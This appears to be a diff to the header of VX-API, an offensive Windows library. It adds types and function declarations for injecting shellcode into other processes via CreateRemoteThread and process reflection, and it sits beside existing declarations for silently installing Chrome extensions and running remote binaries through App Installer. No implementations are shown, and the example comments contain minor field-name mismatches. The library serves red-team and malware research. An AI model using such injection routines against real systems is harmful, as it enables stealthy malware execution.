+      <Filter>Source Files\String Manipulation</Filter>
+    </ClCompile>
  </ItemGroup>
  <ItemGroup>
    <ClInclude Include="Internal.h">
--- a/VX-API/Win32Helper.h
+++ b/VX-API/Win32Helper.h
@ -39,20 +39,25 @@
 #define InlineGetCurrentProcess (HANDLE)((HANDLE)-1)


+/*******************************************
+ SHELLCODE VIA CALLBACK ROUTINE INFORMATION
+*******************************************/
+
 /*

-    LPBYTE Payload is a pointer to shellcode
-    DWORD dwLengthOfPayloadInBytes is the length of the payload in bytes
+    LPBYTE Payload
+        a pointer to shellcode
+    DWORD dwLengthOfPayloadInBytes
+        the length of the payload in bytes
+    Enum SHELLCODE_EXECUTION_METHOD
+        specifies shellcode execution method
+        

    example:
-
    SHELLCODE_EXECUTION_INFORMATION Sei = { 0 };
-    Sei.Payload = Shellcode;
-    Sei.dwLengthOfPayloadInBytes = 280 //whatever the length is
-
-    MethodEnum flag must be one of the values in the SHELLCODE_EXECUTION_METHOD enum
-    each enum indicates which win32 function to use for shellcode execution
-
+    Sei.Payload = Shellcode; //pointer to shellcode
+    Sei.dwLengthOfPayloadInBytes = 280; //whatever the length is
+    Sei.Method = E_CERTENUMSYSTEMSTORE; //method from SHELLCODE_EXECUTION_METHOD
 */

 typedef enum SHELLCODE_EXECUTION_METHOD {
@ -124,6 +129,52 @@ inline CRITICAL_SECTION CriticalSection = { 0 };
 inline DESCRIPTOR_ENTRY* Head = NULL;
 inline HARDWARE_ENGINE_INIT_SETTINGS_GLOBAL GlobalHardwareBreakpointObject;

+/*******************************************
+ PROCESS INJECTION INFORMATION
+*******************************************/
+
+/*
+
+    LPBYTE Payload
+        a pointer to shellcode
+    DWORD dwLengthOfPayloadInBytes
+        the length of the payload in bytes
+    Enum PROCESS_INJECTION_METHOD
+        specifies process injection method
+    DWORD TargetPid
+        specify target process
+    [OPTIONAL] DWORD ThreadId 
+        specify target process thread id (depends PROCESS_INJECTION_METHOD)
+    [OPTIONAL] TCHAR PathToFile //depends on if youre using W or A suffix
+        path to DLL to load (depends PROCESS_INJECTION_METHOD)
+        
+
+    example:
+    PROCESS_INJECTION_INFORMATION Pii = { 0 };
+    Sei.Payload = Shellcode; //pointer to shellcode
+    Pii.dwLengthOfPayloadInBytes = 280; //whatever the length is
+    Pii.Method = E_PROCESSREFLECTION; //method from PROCESS_INJECTION_METHOD
+    Pii.ProcessId = 100; //whatever the process id is, this is just a random number lol
+    Pii.ThreadId = 0; //not required for this method
+    Pii.PathToFile = DllPath; pointer to path of dll you want loaded, only WCHAR supported
+
+*/
+
+typedef enum PROCESS_INJECTION_METHOD {
+    E_WRITEPROCESSMEMORY_CREATEREMOTETHREAD_EXECUTESHELLCODE, //0
+    E_PROCESS_REFLECTION_EXECUTESHELLCODE, //1 UNIMPLEMENTED
+    E_CTRL_INJECT //2
+}PROCESS_INJECTION_METHOD, * PPROCESS_INJECTION_METHOD;
+
+typedef struct __PROCESS_INJECTION_INFORMATION {
+    LPBYTE Payload;
+    DWORD dwLengthOfPayloadInBytes;
+    DWORD MethodEnum;
+    DWORD ProcessId;
+    DWORD ThreadId;
+    PWCHAR PathToFile;
+}PROCESS_INJECTION_INFORMATION, *PPROCESS_INJECTION_INFORMATION;
+


 /*******************************************
@ -309,6 +360,9 @@ BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginW(_In_ PWCHAR Extens
 BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginA(_In_ PCHAR ExtensionIdentifier);
 BOOL MpfLolExecuteRemoteBinaryByAppInstallerW(_In_ PWCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
 BOOL MpfLolExecuteRemoteBinaryByAppInstallerA(_In_ PCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
+DWORD ProcessInjectionMain(_In_ PPROCESS_INJECTION_INFORMATION Pii);
+BOOL MpfProcessInjectionViaProcessReflection(_In_ PBYTE Shellcode, _In_ DWORD dwSizeOfShellcodeInBytes, _In_ DWORD TargetPid);
+BOOL MpfProcessInjectionViaCreateRemoteThread(_In_ PBYTE Shellcode, _In_ DWORD dwSizeOfShellcodeInBytes, _In_ DWORD TargetPid);